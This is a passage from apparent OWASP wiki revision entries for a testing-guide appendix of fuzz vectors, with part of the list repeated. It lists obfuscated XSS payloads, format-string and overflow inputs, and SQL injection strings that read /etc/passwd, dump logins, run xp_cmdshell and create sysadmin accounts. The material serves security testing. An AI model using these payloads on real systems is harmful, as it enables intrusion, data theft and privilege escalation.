&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows (BFO) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here. &lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Errors (FSE) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
.1024d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
%.2049d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Integer Overflows (INT) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Passive SQL Injection (SQP) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select &lt;br /&gt;
&amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Active SQL Injection (SQI) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13691</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13691"/>
				<updated>2006-11-26T10:07:10Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Recursive fuzzing */ replaced owasp.org with example.com&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replasive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replasive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG&lt;br /&gt;
SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows (BFO) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here. &lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
